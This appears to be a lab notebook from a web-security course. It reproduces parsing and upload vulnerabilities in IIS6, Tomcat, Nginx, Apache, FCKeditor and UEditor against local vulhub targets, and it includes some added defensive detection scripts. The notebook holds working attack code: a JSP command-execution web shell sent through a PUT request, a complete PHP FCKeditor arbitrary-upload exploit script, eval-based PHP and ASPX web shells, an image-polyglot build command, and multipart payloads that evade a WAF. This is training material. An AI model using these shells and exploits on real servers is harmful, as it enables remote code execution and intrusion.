I. Parsing vulnerabilities
Requires the vulhub environment.
Build: sudo docker-compose build
Start: sudo docker-compose up -d
Stop: sudo docker-compose down
1、IIS6
vulhub has no IIS target; use the "03 server r1" image from the course materials instead. Username/password: administrator/123456.
Parsing vulnerability overview
1) When a folder whose name ends in .asa or .asp is created, every file under that directory is parsed by IIS as an ASP file.
2) A file named *.asp;1.jpg is likewise parsed by IIS 6.0 as an ASP file.
Steps
- Create a file named IIS.ASP:
<% response.write("i am hacker")%>
- Copy IIS.ASP and name the copy IIS.asp;IIS.jpg
- Place IIS.asp;IIS.jpg in the web root C:\IIS6Web
- Request it through the server IP and path
2、Tomcat
1) Idea: when Tomcat runs on a Windows host with the HTTP PUT method enabled, an attacker can upload a JSP file containing arbitrary code through a crafted request, after which the server executes the code in that JSP file (CVE-2017-12615).
cd /home/enjoy/vulhub-master/tomcat/CVE-2017-12615
docker-compose build
docker-compose up -d
docker-compose config
2) From the host machine, visit http://192.168.254.135:8080/
3) Use Burp to send the request below and upload a .jsp file:
PUT /1.jsp/ HTTP/1.1
Host: 192.168.254.135:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 750

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();
try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
String temp = null;while ((temp = buf.readLine()) != null) {
line.append(temp+"\n");}buf.close();} catch (Exception e) {
line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){
out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
4) Visit http://192.168.254.135:8080/1.jsp?&pwd=023&cmd=dir; in the cmd parameter "any DOS command other than dir can be run as well".
3、Nginx
Idea: a request for 1.jpg/.php makes 1.jpg be parsed as PHP: appending /.php to the path causes the file to be handed to the PHP interpreter.
Server side
cd /home/enjoy/vulhub-master/nginx/nginx_parsing_vulnerability
sudo docker-compose build
sudo docker-compose up -d
sudo docker-compose config
From the host machine, open the VM server IP 192.168.254.135 and upload an image file.
Visit: http://192.168.254.135/uploadfiles/db7f1a5d97d66c9bba4550973b6dafc8.png/a.php
4、Apache
Idea: Apache has a quirk when resolving file types. By default a file may carry several dot-separated suffixes, and Apache recognises them from the rightmost one leftwards: as soon as one of the suffixes is .php the file is treated as a PHP file, even if .php is not the last suffix. This behaviour yields a parsing vulnerability that can bypass an upload whitelist.
1) Start the relevant services on the VM server
cd /home/enjoy/vulhub-master/httpd/apache_parsing_vulnerability
sudo docker-compose build
sudo docker-compose up -d
sudo docker-compose config
5、Apache newline parsing vulnerability
Idea: versions 2.4.0 to 2.4.29 contain a parsing vulnerability: when handling PHP, 1.php\x0A is parsed according to the .php suffix, which bypasses some servers' security policies.
1) Commands on the VM server
cd /home/enjoy/vulhub-master/httpd/CVE-2017-15715
sudo docker-compose build
sudo docker-compose up -d
sudo docker-compose config
2) Visit http://192.168.254.135:8080/index.php and upload the script
3) Intercept with Burp and change the file name evil.php in the captured request to 1.php
4) Send it to Repeater, switch to the Hex view, locate the bytes 70 and 0d following 1.php, insert the byte 0a between them, then send
5) Back in Repeater, replace index.php after POST / with 1.php%0a and send; if the rendered response shows the server's PHP version information, the file was uploaded successfully and the reproduction is complete.
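As a defender-side counterpart to the five parsing patterns above, here is an added Python example (mine, not part of the original notes) that scans access-log lines for requests shaped like each pattern. The log lines are constructed and the rule names are my own; the trailing-space form of the Tomcat PUT path is included alongside the trailing-slash form the notes use.

```python
import re
from urllib.parse import unquote

# One rule per parsing pattern from the sections above (rule names are my own).
RULES = {
    "iis6_script_dir": re.compile(r"/[^/]+\.(?:asp|asa)/[^/]+$", re.I),        # x.asp/anything
    "iis6_semicolon": re.compile(r"\.asp;[^/]*$", re.I),                        # IIS.asp;IIS.jpg
    "tomcat_put_jsp": re.compile(r"\.jsp(?:/|\s)$", re.I),                      # PUT /1.jsp/ or trailing space
    "nginx_fastcgi_split": re.compile(r"\.(?:jpe?g|png|gif)/[^/]*\.php$", re.I),  # x.png/a.php
    "apache_multi_ext": re.compile(r"\.php\.[a-z0-9]+$", re.I),                 # a.php.jpg
    "apache_cve_2017_15715": re.compile(r"\.php\n$"),                            # 1.php%0a
}

# Common/combined log format: ip ident user [time] "METHOD PATH PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3}')

def classify_path(method, raw_path):
    """Return the names of the parsing patterns a request matches (empty list if none)."""
    path = unquote(raw_path.split("?", 1)[0])  # decode %0a / %20 so the rules see real bytes
    hits = []
    for name, rx in RULES.items():
        if name == "tomcat_put_jsp" and method.upper() != "PUT":
            continue  # the Tomcat pattern only matters for PUT uploads
        if rx.search(path):
            hits.append(name)
    return hits

def scan_log(lines):
    """Return (client_ip, path, hits) for every log line that matches at least one rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ip, method, path = m.groups()
            hits = classify_path(method, path)
            if hits:
                findings.append((ip, path, hits))
    return findings

# Constructed log lines mirroring the requests used in the sections above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /IIS.asp;IIS.jpg HTTP/1.1" 200 12',
    '192.0.2.11 - - [01/Jan/2024:10:00:01 +0000] "PUT /1.jsp/ HTTP/1.1" 201 0',
    '192.0.2.12 - - [01/Jan/2024:10:00:02 +0000] "GET /uploadfiles/x.png/a.php HTTP/1.1" 200 40',
    '192.0.2.13 - - [01/Jan/2024:10:00:03 +0000] "POST /1.php%0a HTTP/1.1" 200 40',
    '192.0.2.14 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1 HTTP/1.1" 200 40',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path!r} -> {', '.join(hits)}")
```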
II. Editor vulnerabilities
1、fckeditor editor vulnerability
Idea: extract fckeditor into the upload-labs target directory D:\upload-labs-env and edit config.php under fckeditor\editor\filemanager\connectors\php\
Visit http://localhost/fckeditor/_whatsnew.html
Create a .php file:
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
// STDIN is predefined in the CLI SAPI; the original unquoted define() errors on PHP 8
if (!defined('STDIN')) define('STDIN', fopen("php://stdin", "r"));
$match = array();

// Send a raw HTTP packet to $host:80 and return the whole response
function http_send($host, $packet)
{
    $resp = "";
    $sock = fsockopen($host, 80);
    while (!$sock)
    {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    print $resp;
    return $resp;
}

// The connector replies with OnUploadCompleted(code, "url"); codes 0 and 201 mean the upload succeeded
// (\d+ instead of the original \d, which could never match the three-digit 201)
function connector_response($html)
{
    global $match;
    return (preg_match("/OnUploadCompleted\((\d+),\"(.*)\"\)/", $html, $match) &&
            in_array($match[1], array(0, 201)));
}

print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";
print "\n+------------------------------------------------------------------+\n";
if ($argc < 3)
{
    print "\nUsage......: php $argv[0] host path\n";
    print "\nExample....: php $argv[0] localhost /\n";
    print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
    die();
}
$host = $argv[1];
// collapse repeated slashes (ereg_replace was removed in PHP 7)
$path = preg_replace("#/{2,}#", "/", $argv[2]);
$filename = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";
// multipart body: one file field named NewFile
$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[cmd]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";
// request line and headers (each header must stay on a single line)
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
print $packet;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://{$host}/$match[2] \n";
?>
Command assembly
cd D:\upload-labs-env\PHP> (open CMD in the directory that contains php.exe) php.exe (type php.exe) C:\Users\运输大队长\Desktop\fck.php (drag the .php file into CMD) 127.0.0.1:80 /fckeditor/ (paste the fixed fckeditor path)
D:\upload-labs-env\PHP>php.exe C:\Users\运输大队长\Desktop\fck.php 127.0.0.1:80 /fckeditor/
All of the above is just to get one .php file uploaded!
<?php eval($_POST[cmd]) ?>
$_POST[cmd] reads the cmd parameter from the POST body
eval executes the received parameter as PHP code
2、ueditor
Requires a Windows 2008 environment and a server reachable from the internet
1) Load the 2008 VM and open the IIS application from the Start menu
Method 1: select the uedit site under the website directory, then click "Browse website" on the right (port 88)
Method 2: get the local IP with ipconfig, append the port number, and open it in the browser
2) Visit http://192.168.254.136:88/net/controller.ashx; the screen below means the environment is set up correctly
3) Upload the file shell.aspx:
<% @Page Language="Jscript"%><%eval(Request.Item["req"],"unsafe");%>
4) Build the image file:
copy image.png /b + shell.aspx /a ueditor.jpg
<form action="http://192.168.254.136:88/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
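The copy /b + /a step above yields an image that still carries a script page after the pixel data. As an added Python check (mine, not from the notes or from ueditor), the function below verifies the magic bytes against the declared extension and scans for server-side script markers; the PNG header and the appended page directive are constructed inputs.

```python
import re

# Magic bytes of the image types an upload handler usually accepts (well-known values).
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Markers of server-side script pages; a genuine image never needs to contain them.
SCRIPT_MARKERS = re.compile(rb"<%|<\?php|<\?=|<script[^>]+runat=", re.I)

def inspect_image(data: bytes, declared_ext: str) -> dict:
    """Check that the bytes match the declared extension and carry no script markers.
    script_offset is the position of the first marker, or -1 when none is found."""
    ext = declared_ext.lower().lstrip(".")
    magic = MAGIC.get(ext)
    magic_ok = magic is not None and data.startswith(magic)
    m = SCRIPT_MARKERS.search(data)
    return {
        "magic_ok": magic_ok,
        "script_offset": m.start() if m else -1,
        "accept": magic_ok and m is None,
    }

# Constructed inputs: a PNG header padded with zeros, and the same bytes with an
# ASP.NET page directive appended, the shape "copy image.png /b + shell.aspx /a" produces.
CLEAN_PNG = MAGIC["png"] + b"\x00" * 64
POLYGLOT = CLEAN_PNG + b'<% @Page Language="Jscript"%>'

if __name__ == "__main__":
    print(inspect_image(CLEAN_PNG, "png"))
    print(inspect_image(POLYGLOT, "jpg"))   # renamed to ueditor.jpg: wrong magic, script present
```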
3、WAF bypass
(SafeDog) environment
cd C:\Users\86188\Desktop\tool\upload-labs-env\Apache\bin
httpd.exe -k install -n apache2.0
# to remove the service:
sc delete apache2.0
1) Junk-data overflow: write a large amount of junk data into the field that is being validated
Modify the request in Burp:
POST /Pass-02/index.php HTTP/1.1
Host: 192.168.0.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13579348911060107162093134725
Content-Length: 823
Origin: http://192.168.0.25
Connection: close
Referer: http://192.168.0.25/Pass-02/index.php
Upgrade-Insecure-Requests: 1

-----------------------------13579348911060107162093134725
Content-Disposition: form-data; asdasdasdasdasdasddasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdassdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdassdsasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasasdddasdasdasdasdasdasasdasaddasdasdadasdasdasdasdasdassdasdasdasasdasdasdasdasdassdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdassssssdasdasdasdasdasdasdasdasdasdasdasdas; name="upload_file"; filename="info.php"
Content-Type: image/png

-----------------------------13579348911060107162093134725
Content-Disposition: form-data; name="submit"

上传
-----------------------------13579348911060107162093134725--
-----------------------------13579348911060107162093134725
Content-Disposition: form-data;name="upload_file"; filename="info.php;
Content-Type: image/png
3) Data truncation: a semicolon marks the end of a statement
Content-Disposition: form-data;name="upload_file";
filename="x.jpg;.php";
Content-Type: image/png
4) Line break
Content-Disposition: form-data;name="upload_file";
filename="
a
.
p
h
p";
Content-Type: image/png
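All four multipart tricks above work because the WAF and the upload handler read the same Content-Disposition header differently. The added Python example below (mine, not from the notes or from any WAF) parses the header the permissive way and flags each trick, and also handles the null-byte truncation used in the fckeditor folder name earlier on the page; the sample headers are constructed and the anomaly names are my own.

```python
import re
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

def split_params(header):
    # Split on ';' outside double quotes; also return whether a quote was left open.
    parts, cur, in_quote = [], [], False
    for ch in header:
        if ch == '"':
            in_quote = not in_quote
        if ch == ";" and not in_quote:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return parts, in_quote

def check_upload(header):
    # Parse like a permissive server (quotes beat ';', line breaks inside quotes survive).
    anomalies, params = [], {}
    parts, unterminated = split_params(header)
    if unterminated:
        anomalies.append("unterminated_quote")
    for part in parts[1:]:                          # parts[0] is the "form-data" type
        part = part.strip()
        if "=" not in part:
            anomalies += ["junk_token"] if part else []  # padding before the real fields
            continue
        key, value = part.split("=", 1)
        value = value.strip()
        if value.startswith('"'):                   # an open quote swallows the rest
            value = value[1:-1] if len(value) > 1 and value.endswith('"') else value[1:]
        params[key.strip().lower()] = value
    raw = params.get("filename", "")
    for needle, label in (("\x00", "null_byte"), (";", "semicolon_in_filename")):
        if needle in raw:
            anomalies.append(label)
    if re.search(r"[\r\n]", raw):
        anomalies.append("newline_in_filename")
    name = re.sub(r"[\r\n]", "", raw.split("\x00", 1)[0])  # what a C path API sees
    if name.count(".") > 1:
        anomalies.append("multiple_extensions")
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    return {"filename": name, "ext": ext, "anomalies": anomalies,
            "allowed": not anomalies and ext in ALLOWED_EXT}

# Constructed headers: one clean, then the semicolon and line-break tricks from above.
SAMPLES = ['form-data; name="upload_file"; filename="cat.png"',
           'form-data;name="upload_file"; filename="x.jpg;.php";',
           'form-data;name="upload_file";\r\nfilename="\r\na\r\n.\r\np\r\nh\r\np";']
```

Any anomaly rejects the upload outright; only a clean header with a whitelisted final extension is accepted.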
4、Fuzz testing